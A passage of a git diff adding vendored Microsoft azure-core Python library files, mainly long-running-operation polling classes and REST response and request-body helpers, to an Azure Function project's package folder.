import PollingMethod +from ..pipeline.policies._utils import get_retry_after +from ..pipeline._tools import is_rest +from .._enum_meta import CaseInsensitiveEnumMeta + +if TYPE_CHECKING: + from azure.core.pipeline import PipelineResponse + from azure.core.pipeline.transport import ( + HttpResponse, + AsyncHttpResponse, + HttpRequest, + ) + + ResponseType = Union[HttpResponse, AsyncHttpResponse] + PipelineResponseType = PipelineResponse[HttpRequest, ResponseType] + + +try: + ABC = abc.ABC +except AttributeError: # Python 2.7, abc exists, but not ABC + ABC = abc.ABCMeta("ABC", (object,), {"__slots__": ()}) # type: ignore + +_FINISHED = frozenset(["succeeded", "canceled", "failed"]) +_FAILED = frozenset(["canceled", "failed"]) +_SUCCEEDED = frozenset(["succeeded"]) + +def _finished(status): + if hasattr(status, "value"): + status = status.value + return str(status).lower() in _FINISHED + + +def _failed(status): + if hasattr(status, "value"): + status = status.value + return str(status).lower() in _FAILED + + +def _succeeded(status): + if hasattr(status, "value"): + status = status.value + return str(status).lower() in _SUCCEEDED + + +class BadStatus(Exception): + pass + + +class BadResponse(Exception): + pass + + +class OperationFailed(Exception): + pass + + +def _as_json(response): + # type: (ResponseType) -> dict + """Assuming this is not empty, return the content as JSON. + + Result/exceptions is not determined if you call this method without testing _is_empty. + + :raises: DecodeError if response body contains invalid json data. + """ + try: + return json.loads(response.text()) + except ValueError: + raise DecodeError("Error occurred in deserializing the response body.") + + +def _raise_if_bad_http_status_and_method(response): + # type: (ResponseType) -> None + """Check response status code is valid. + + Must be 200, 201, 202, or 204. + + :raises: BadStatus if invalid status. + """ + code = response.status_code + if code in {200, 201, 202, 204}: + return + raise BadStatus( + "Invalid return status {!r} for {!r} operation".format( + code, response.request.method + ) + ) + + +def _is_empty(response): + # type: (ResponseType) -> bool + """Check if response body contains meaningful content. + + :rtype: bool + """ + return not bool(response.body()) + + +class LongRunningOperation(ABC): + """LongRunningOperation + Provides default logic for interpreting operation responses + and status updates. + + :param azure.core.pipeline.PipelineResponse response: The initial pipeline response. + :param callable deserialization_callback: The deserialization callaback. + :param dict lro_options: LRO options. + :param kwargs: Unused for now + """ + + @abc.abstractmethod + def can_poll(self, pipeline_response): + # type: (PipelineResponseType) -> bool + """Answer if this polling method could be used. + """ + raise NotImplementedError() + + @abc.abstractmethod + def get_polling_url(self): + # type: () -> str + """Return the polling URL. + """ + raise NotImplementedError() + + @abc.abstractmethod + def set_initial_status(self, pipeline_response): + # type: (PipelineResponseType) -> str + """Process first response after initiating long running operation. + + :param azure.core.pipeline.PipelineResponse response: initial REST call response. 
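The terminal-state helpers defined earlier in this file compare case-insensitively and accept either plain strings or enum members exposing `.value`; for instance:

```python
_finished("Succeeded")   # True
_finished("InProgress")  # False
_failed("CANCELED")      # True
_succeeded("succeeded")  # True
```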
+ """ + raise NotImplementedError() + + @abc.abstractmethod + def get_status(self, pipeline_response): + # type: (PipelineResponseType) -> str + """Return the status string extracted from this response.""" + raise NotImplementedError() + + @abc.abstractmethod + def get_final_get_url(self, pipeline_response): + # type: (PipelineResponseType) -> Optional[str] + """If a final GET is needed, returns the URL. + + :rtype: str + """ + raise NotImplementedError() + +class _LroOption(str, Enum, metaclass=CaseInsensitiveEnumMeta): + """Known LRO options from Swagger.""" + + FINAL_STATE_VIA = "final-state-via" + + +class _FinalStateViaOption(str, Enum, metaclass=CaseInsensitiveEnumMeta): + """Possible final-state-via options.""" + + AZURE_ASYNC_OPERATION_FINAL_STATE = "azure-async-operation" + LOCATION_FINAL_STATE = "location" + OPERATION_LOCATION_FINAL_STATE = "operation-location" + + +class OperationResourcePolling(LongRunningOperation): + """Implements a operation resource polling, typically from Operation-Location. + + :param str operation_location_header: Name of the header to return operation format (default 'operation-location') + :keyword dict[str, any] lro_options: Additional options for LRO. For more information, see + https://aka.ms/azsdk/autorest/openapi/lro-options + """ + + def __init__( + self, operation_location_header="operation-location", *, lro_options=None + ): + self._operation_location_header = operation_location_header + + # Store the initial URLs + self._async_url = None + self._location_url = None + self._request = None + self._lro_options = lro_options or {} + + def can_poll(self, pipeline_response): + """Answer if this polling method could be used. + """ + response = pipeline_response.http_response + return self._operation_location_header in response.headers + + def get_polling_url(self): + # type: () -> str + """Return the polling URL. + """ + return self._async_url + + def get_final_get_url(self, pipeline_response): + # type: (PipelineResponseType) -> Optional[str] + """If a final GET is needed, returns the URL. + + :rtype: str + """ + if ( + self._lro_options.get(_LroOption.FINAL_STATE_VIA) == _FinalStateViaOption.LOCATION_FINAL_STATE + and self._location_url + ): + return self._location_url + if ( + self._lro_options.get(_LroOption.FINAL_STATE_VIA) + in [ + _FinalStateViaOption.AZURE_ASYNC_OPERATION_FINAL_STATE, + _FinalStateViaOption.OPERATION_LOCATION_FINAL_STATE + ] + and self._request.method == "POST" + ): + return None + response = pipeline_response.http_response + if not _is_empty(response): + body = _as_json(response) + # https://github.com/microsoft/api-guidelines/blob/vNext/Guidelines.md#target-resource-location + resource_location = body.get("resourceLocation") + if resource_location: + return resource_location + + if self._request.method in {"PUT", "PATCH"}: + return self._request.url + + if self._request.method == "POST" and self._location_url: + return self._location_url + + return None + + def set_initial_status(self, pipeline_response): + # type: (PipelineResponseType) -> str + """Process first response after initiating long running operation. + + :param azure.core.pipeline.PipelineResponse response: initial REST call response. 
+ """ + self._request = pipeline_response.http_response.request + response = pipeline_response.http_response + + self._set_async_url_if_present(response) + + if response.status_code in {200, 201, 202, 204} and self._async_url: + return "InProgress" + raise OperationFailed("Operation failed or canceled") + + def _set_async_url_if_present(self, response): + # type: (ResponseType) -> None + self._async_url = response.headers[self._operation_location_header] + + location_url = response.headers.get("location") + if location_url: + self._location_url = location_url + + def get_status(self, pipeline_response): + # type: (PipelineResponseType) -> str + """Process the latest status update retrieved from an "Operation-Location" header. + + :param azure.core.pipeline.PipelineResponse response: The response to extract the status. + :raises: BadResponse if response has no body, or body does not contain status. + """ + response = pipeline_response.http_response + if _is_empty(response): + raise BadResponse( + "The response from long running operation does not contain a body." + ) + + body = _as_json(response) + status = body.get("status") + if not status: + raise BadResponse("No status found in body") + return status + + +class LocationPolling(LongRunningOperation): + """Implements a Location polling. + """ + + def __init__(self): + self._location_url = None + + def can_poll(self, pipeline_response): + # type: (PipelineResponseType) -> bool + """Answer if this polling method could be used. + """ + response = pipeline_response.http_response + return "location" in response.headers + + def get_polling_url(self): + # type: () -> str + """Return the polling URL. + """ + return self._location_url + + def get_final_get_url(self, pipeline_response): + # type: (PipelineResponseType) -> Optional[str] + """If a final GET is needed, returns the URL. + + :rtype: str + """ + return None + + def set_initial_status(self, pipeline_response): + # type: (PipelineResponseType) -> str + """Process first response after initiating long running operation. + + :param azure.core.pipeline.PipelineResponse response: initial REST call response. + """ + response = pipeline_response.http_response + + self._location_url = response.headers["location"] + + if response.status_code in {200, 201, 202, 204} and self._location_url: + return "InProgress" + raise OperationFailed("Operation failed or canceled") + + def get_status(self, pipeline_response): + # type: (PipelineResponseType) -> str + """Process the latest status update retrieved from a 'location' header. + + :param azure.core.pipeline.PipelineResponse response: latest REST call response. + :raises: BadResponse if response has no body and not status 202. + """ + response = pipeline_response.http_response + if "location" in response.headers: + self._location_url = response.headers["location"] + + return "InProgress" if response.status_code == 202 else "Succeeded" + + +class StatusCheckPolling(LongRunningOperation): + """Should be the fallback polling, that don't poll but exit successfully + if not other polling are detected and status code is 2xx. + """ + + def can_poll(self, pipeline_response): + # type: (PipelineResponseType) -> bool + """Answer if this polling method could be used. + """ + return True + + def get_polling_url(self): + # type: () -> str + """Return the polling URL. 
+ """ + raise ValueError("This polling doesn't support polling") + + def set_initial_status(self, pipeline_response): + # type: (PipelineResponseType) -> str + """Process first response after initiating long running + operation and set self.status attribute. + + :param azure.core.pipeline.PipelineResponse response: initial REST call response. + """ + return "Succeeded" + + def get_status(self, pipeline_response): + # type: (PipelineResponseType) -> str + return "Succeeded" + + def get_final_get_url(self, pipeline_response): + # type: (PipelineResponseType) -> Optional[str] + """If a final GET is needed, returns the URL. + + :rtype: str + """ + return None + + +class LROBasePolling(PollingMethod): # pylint: disable=too-many-instance-attributes + """A base LRO poller. + + This assumes a basic flow: + - I analyze the response to decide the polling approach + - I poll + - I ask the final resource depending of the polling approach + + If your polling need are more specific, you could implement a PollingMethod directly + """ + + def __init__( + self, + timeout=30, + lro_algorithms=None, + lro_options=None, + path_format_arguments=None, + **operation_config + ): + self._lro_algorithms = lro_algorithms or [ + OperationResourcePolling(lro_options=lro_options), + LocationPolling(), + StatusCheckPolling(), + ] + + self._timeout = timeout + self._client = None # Will hold the Pipelineclient + self._operation = None # Will hold an instance of LongRunningOperation + self._initial_response = None # Will hold the initial response + self._pipeline_response = None # Will hold latest received response + self._deserialization_callback = None # Will hold the deserialization callback + self._operation_config = operation_config + self._lro_options = lro_options + self._path_format_arguments = path_format_arguments + self._status = None + + def status(self): + """Return the current status as a string. + :rtype: str + """ + if not self._operation: + raise ValueError( + "set_initial_status was never called. Did you give this instance to a poller?" + ) + return self._status + + def finished(self): + """Is this polling finished? + :rtype: bool + """ + return _finished(self.status()) + + def resource(self): + """Return the built resource. + """ + return self._parse_resource(self._pipeline_response) + + @property + def _transport(self): + return self._client._pipeline._transport # pylint: disable=protected-access + + def initialize(self, client, initial_response, deserialization_callback): + """Set the initial status of this LRO. 
+ + :param initial_response: The initial response of the poller + :raises: HttpResponseError if initial status is incorrect LRO state + """ + self._client = client + self._pipeline_response = self._initial_response = initial_response + self._deserialization_callback = deserialization_callback + + for operation in self._lro_algorithms: + if operation.can_poll(initial_response): + self._operation = operation + break + else: + raise BadResponse("Unable to find status link for polling.") + + try: + _raise_if_bad_http_status_and_method(self._initial_response.http_response) + self._status = self._operation.set_initial_status(initial_response) + + except BadStatus as err: + self._status = "Failed" + raise HttpResponseError(response=initial_response.http_response, error=err) + except BadResponse as err: + self._status = "Failed" + raise HttpResponseError( + response=initial_response.http_response, message=str(err), error=err + ) + except OperationFailed as err: + raise HttpResponseError(response=initial_response.http_response, error=err) + + def get_continuation_token(self): + # type() -> str + import pickle + return base64.b64encode(pickle.dumps(self._initial_response)).decode('ascii') + + @classmethod + def from_continuation_token(cls, continuation_token, **kwargs): + # type(str, Any) -> Tuple + try: + client = kwargs["client"] + except KeyError: + raise ValueError("Need kwarg 'client' to be recreated from continuation_token") + + try: + deserialization_callback = kwargs["deserialization_callback"] + except KeyError: + raise ValueError("Need kwarg 'deserialization_callback' to be recreated from continuation_token") + + import pickle + initial_response = pickle.loads(base64.b64decode(continuation_token)) # nosec + # Restore the transport in the context + initial_response.context.transport = client._pipeline._transport # pylint: disable=protected-access + return client, initial_response, deserialization_callback + + def run(self): + try: + self._poll() + + except BadStatus as err: + self._status = "Failed" + raise HttpResponseError( + response=self._pipeline_response.http_response, + error=err + ) + + except BadResponse as err: + self._status = "Failed" + raise HttpResponseError( + response=self._pipeline_response.http_response, + message=str(err), + error=err + ) + + except OperationFailed as err: + raise HttpResponseError( + response=self._pipeline_response.http_response, + error=err + ) + + def _poll(self): + """Poll status of operation so long as operation is incomplete and + we have an endpoint to query. + + :param callable update_cmd: The function to call to retrieve the + latest status of the long running operation. + :raises: OperationFailed if operation status 'Failed' or 'Canceled'. + :raises: BadStatus if response status invalid. + :raises: BadResponse if response invalid. + """ + + while not self.finished(): + self._delay() + self.update_status() + + if _failed(self.status()): + raise OperationFailed("Operation failed or canceled") + + final_get_url = self._operation.get_final_get_url(self._pipeline_response) + if final_get_url: + self._pipeline_response = self.request_status(final_get_url) + _raise_if_bad_http_status_and_method(self._pipeline_response.http_response) + + def _parse_resource(self, pipeline_response): + # type: (PipelineResponseType) -> Optional[Any] + """Assuming this response is a resource, use the deserialization callback to parse it. + If body is empty, assuming no resource to return. 
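For reference, the default algorithm stack built in `__init__` above can be spelled out explicitly; `can_poll()` is consulted in list order, so the status-check fallback must come last:

```python
from azure.core.polling.base_polling import (
    LROBasePolling,
    LocationPolling,
    OperationResourcePolling,
    StatusCheckPolling,
)

polling_method = LROBasePolling(
    timeout=10,  # fallback delay when no Retry-After header is present
    lro_algorithms=[
        OperationResourcePolling(),
        LocationPolling(),
        StatusCheckPolling(),
    ],
)
```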
+ """ + response = pipeline_response.http_response + if not _is_empty(response): + return self._deserialization_callback(pipeline_response) + return None + + def _sleep(self, delay): + self._transport.sleep(delay) + + def _extract_delay(self): + if self._pipeline_response is None: + return None + delay = get_retry_after(self._pipeline_response) + if delay: + return delay + return self._timeout + + def _delay(self): + """Check for a 'retry-after' header to set timeout, + otherwise use configured timeout. + """ + delay = self._extract_delay() + self._sleep(delay) + + def update_status(self): + """Update the current status of the LRO. + """ + self._pipeline_response = self.request_status(self._operation.get_polling_url()) + _raise_if_bad_http_status_and_method(self._pipeline_response.http_response) + self._status = self._operation.get_status(self._pipeline_response) + + def _get_request_id(self): + return self._pipeline_response.http_response.request.headers[ + "x-ms-client-request-id" + ] + + def request_status(self, status_link): + """Do a simple GET to this status link. + + This method re-inject 'x-ms-client-request-id'. + + :rtype: azure.core.pipeline.PipelineResponse + """ + if self._path_format_arguments: + status_link = self._client.format_url(status_link, **self._path_format_arguments) + # Re-inject 'x-ms-client-request-id' while polling + if "request_id" not in self._operation_config: + self._operation_config["request_id"] = self._get_request_id() + if is_rest(self._initial_response.http_response): + # if I am a azure.core.rest.HttpResponse + # want to keep making azure.core.rest calls + from azure.core.rest import HttpRequest as RestHttpRequest + request = RestHttpRequest("GET", status_link) + return self._client.send_request( + request, _return_pipeline_response=True, **self._operation_config + ) + # if I am a azure.core.pipeline.transport.HttpResponse + request = self._client.get(status_link) + return self._client._pipeline.run( # pylint: disable=protected-access + request, stream=False, **self._operation_config + ) + + +__all__ = [ + 'BadResponse', + 'BadStatus', + 'OperationFailed', + 'LongRunningOperation', + 'OperationResourcePolling', + 'LocationPolling', + 'StatusCheckPolling', + 'LROBasePolling', +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/py.typed b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/py.typed new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__init__.py new file mode 100644 index 0000000..6552fd5 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__init__.py @@ -0,0 +1,51 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. 
+# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +try: + from ._rest_py3 import ( + HttpRequest, + HttpResponse, + ) +except (SyntaxError, ImportError): + from ._rest import ( # type: ignore + HttpRequest, + HttpResponse, + ) + +__all__ = [ + "HttpRequest", + "HttpResponse", +] + +try: + from ._rest_py3 import ( # pylint: disable=unused-import + AsyncHttpResponse, + ) + __all__.extend([ + "AsyncHttpResponse", + ]) + +except (SyntaxError, ImportError): + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..e3076ee Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_aiohttp.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_aiohttp.cpython-39.pyc new file mode 100644 index 0000000..e590adb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_aiohttp.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_helpers.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_helpers.cpython-39.pyc new file mode 100644 index 0000000..9ce97e0 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_helpers.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_http_response_impl.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_http_response_impl.cpython-39.pyc new file mode 100644 index 0000000..c0e0bb5 Binary files /dev/null and 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_http_response_impl.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_http_response_impl_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_http_response_impl_async.cpython-39.pyc new file mode 100644 index 0000000..d93623e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_http_response_impl_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_requests_asyncio.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_requests_asyncio.cpython-39.pyc new file mode 100644 index 0000000..8e50100 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_requests_asyncio.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_requests_basic.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_requests_basic.cpython-39.pyc new file mode 100644 index 0000000..7fdd4fb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_requests_basic.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_requests_trio.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_requests_trio.cpython-39.pyc new file mode 100644 index 0000000..20035cf Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_requests_trio.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_rest.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_rest.cpython-39.pyc new file mode 100644 index 0000000..8d898f6 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_rest.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_rest_py3.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_rest_py3.cpython-39.pyc new file mode 100644 index 0000000..9f0401f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/__pycache__/_rest_py3.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_aiohttp.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_aiohttp.py new file mode 100644 index 0000000..1505482 --- /dev/null +++ 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_aiohttp.py @@ -0,0 +1,204 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import collections.abc +import asyncio +from itertools import groupby +from typing import AsyncIterator +from multidict import CIMultiDict +from ._http_response_impl_async import AsyncHttpResponseImpl, AsyncHttpResponseBackcompatMixin +from ..pipeline.transport._aiohttp import AioHttpStreamDownloadGenerator +from ..utils._pipeline_transport_rest_shared import _pad_attr_name, _aiohttp_body_helper +from ..exceptions import ResponseNotReadError + +class _ItemsView(collections.abc.ItemsView): + def __init__(self, ref): + super().__init__(ref) + self._ref = ref + + def __iter__(self): + for key, groups in groupby(self._ref.__iter__(), lambda x: x[0]): + yield tuple([key, ", ".join(group[1] for group in groups)]) + + def __contains__(self, item): + if not (isinstance(item, (list, tuple)) and len(item) == 2): + return False + for k, v in self.__iter__(): + if item[0].lower() == k.lower() and item[1] == v: + return True + return False + + def __repr__(self): + return f"dict_items({list(self.__iter__())})" + +class _KeysView(collections.abc.KeysView): + def __init__(self, items): + super().__init__(items) + self._items = items + + def __iter__(self): + for key, _ in self._items: + yield key + + def __contains__(self, key): + for k in self.__iter__(): + if key.lower() == k.lower(): + return True + return False + def __repr__(self): + return f"dict_keys({list(self.__iter__())})" + +class _ValuesView(collections.abc.ValuesView): + def __init__(self, items): + super().__init__(items) + self._items = items + + def __iter__(self): + for _, value in self._items: + yield value + + def __contains__(self, value): + for v in self.__iter__(): + if value == v: + return True + return False + + def __repr__(self): + return f"dict_values({list(self.__iter__())})" + + +class _CIMultiDict(CIMultiDict): + """Dictionary with the support for duplicate case-insensitive keys.""" + + def __iter__(self): + return iter(self.keys()) + + def keys(self): + """Return a new view of the dictionary's keys.""" + return _KeysView(self.items()) + + def items(self): + """Return a new view of the 
dictionary's items.""" + return _ItemsView(super().items()) + + def values(self): + """Return a new view of the dictionary's values.""" + return _ValuesView(self.items()) + + def __getitem__(self, key: str) -> str: + return ", ".join(self.getall(key, [])) + + def get(self, key, default=None): + values = self.getall(key, None) + if values: + values = ", ".join(values) + return values or default + +class _RestAioHttpTransportResponseBackcompatMixin(AsyncHttpResponseBackcompatMixin): + """Backcompat mixin for aiohttp responses. + + Need to add it's own mixin because it has function load_body, which other + transport responses don't have, and also because we need to synchronously + decompress the body if users call .body() + """ + + def body(self) -> bytes: + """Return the whole body as bytes in memory. + + Have to modify the default behavior here. In AioHttp, we do decompression + when accessing the body method. The behavior here is the same as if the + caller did an async read of the response first. But for backcompat reasons, + we need to support this decompression within the synchronous body method. + """ + return _aiohttp_body_helper(self) + + async def _load_body(self) -> None: + """Load in memory the body, so it could be accessible from sync methods.""" + self._content = await self.read() # type: ignore + + def __getattr__(self, attr): + backcompat_attrs = ["load_body"] + attr = _pad_attr_name(attr, backcompat_attrs) + return super().__getattr__(attr) + +class RestAioHttpTransportResponse(AsyncHttpResponseImpl, _RestAioHttpTransportResponseBackcompatMixin): + def __init__( + self, + *, + internal_response, + decompress: bool = True, + **kwargs + ): + headers = _CIMultiDict(internal_response.headers) + super().__init__( + internal_response=internal_response, + status_code=internal_response.status, + headers=headers, + content_type=headers.get('content-type'), + reason=internal_response.reason, + stream_download_generator=AioHttpStreamDownloadGenerator, + content=None, + **kwargs + ) + self._decompress = decompress + self._decompressed_content = False + + def __getstate__(self): + state = self.__dict__.copy() + # Remove the unpicklable entries. + state['_internal_response'] = None # aiohttp response are not pickable (see headers comments) + state['headers'] = CIMultiDict(self.headers) # MultiDictProxy is not pickable + return state + + @property + def content(self): + # type: (...) -> bytes + """Return the response's content in bytes.""" + if self._content is None: + raise ResponseNotReadError(self) + return _aiohttp_body_helper(self) + + async def read(self) -> bytes: + """Read the response's bytes into memory. + + :return: The response's bytes + :rtype: bytes + """ + if not self._content: + self._stream_download_check() + self._content = await self._internal_response.read() + await self._set_read_checks() + return _aiohttp_body_helper(self) + + async def close(self) -> None: + """Close the response. 
+ + :return: None + :rtype: None + """ + if not self.is_closed: + self._is_closed = True + self._internal_response.close() + await asyncio.sleep(0) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_helpers.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_helpers.py new file mode 100644 index 0000000..2234a8b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/rest/_helpers.py @@ -0,0 +1,369 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import copy +import codecs +import cgi +from json import dumps +from typing import ( + Optional, + Union, + Mapping, + Sequence, + Tuple, + IO, + Any, + Dict, + Iterable, + MutableMapping, + AsyncIterable +) +import xml.etree.ElementTree as ET +import six +try: + binary_type = str + from urlparse import urlparse # type: ignore +except ImportError: + binary_type = bytes # type: ignore + from urllib.parse import urlparse +from azure.core.serialization import AzureJSONEncoder +from ..utils._pipeline_transport_rest_shared import ( + _format_parameters_helper, + _pad_attr_name, + _prepare_multipart_body_helper, + _serialize_request, + _format_data_helper, +) + +################################### TYPES SECTION ######################### + +PrimitiveData = Optional[Union[str, int, float, bool]] + + +ParamsType = Mapping[str, Union[PrimitiveData, Sequence[PrimitiveData]]] + +FileContent = Union[str, bytes, IO[str], IO[bytes]] +FileType = Tuple[Optional[str], FileContent] + +FilesType = Union[ + Mapping[str, FileType], + Sequence[Tuple[str, FileType]] +] + +ContentTypeBase = Union[str, bytes, Iterable[bytes]] +ContentType = Union[str, bytes, Iterable[bytes], AsyncIterable[bytes]] + +########################### HELPER SECTION ################################# + +def _verify_data_object(name, value): + if not isinstance(name, six.string_types): + raise TypeError( + "Invalid type for data name. Expected str, got {}: {}".format( + type(name), name + ) + ) + if value is not None and not isinstance(value, (six.string_types, bytes, int, float)): + raise TypeError( + "Invalid type for data value. 
Expected primitive type, got {}: {}".format( + type(value), value + ) + ) + +def set_urlencoded_body(data, has_files): + body = {} + default_headers = {} + for f, d in data.items(): + if not d: + continue + if isinstance(d, list): + for item in d: + _verify_data_object(f, item) + else: + _verify_data_object(f, d) + body[f] = d + if not has_files: + # little hacky, but for files we don't send a content type with + # boundary so requests / aiohttp etc deal with it + default_headers["Content-Type"] = "application/x-www-form-urlencoded" + return default_headers, body + +def set_multipart_body(files): + formatted_files = { + f: _format_data_helper(d) for f, d in files.items() if d is not None + } + return {}, formatted_files + +def set_xml_body(content): + headers = {} + bytes_content = ET.tostring(content, encoding="utf8") + body = bytes_content.replace(b"encoding='utf8'", b"encoding='utf-8'") + if body: + headers["Content-Length"] = str(len(body)) + return headers, body + +def set_content_body(content: Any) -> Tuple[MutableMapping[str, str], Optional[ContentTypeBase]]: + headers: MutableMapping[str, str] = {} + + if isinstance(content, ET.Element): + # XML body + return set_xml_body(content) + if isinstance(content, (six.string_types, bytes)): + headers = {} + body = content + if isinstance(content, six.string_types): + headers["Content-Type"] = 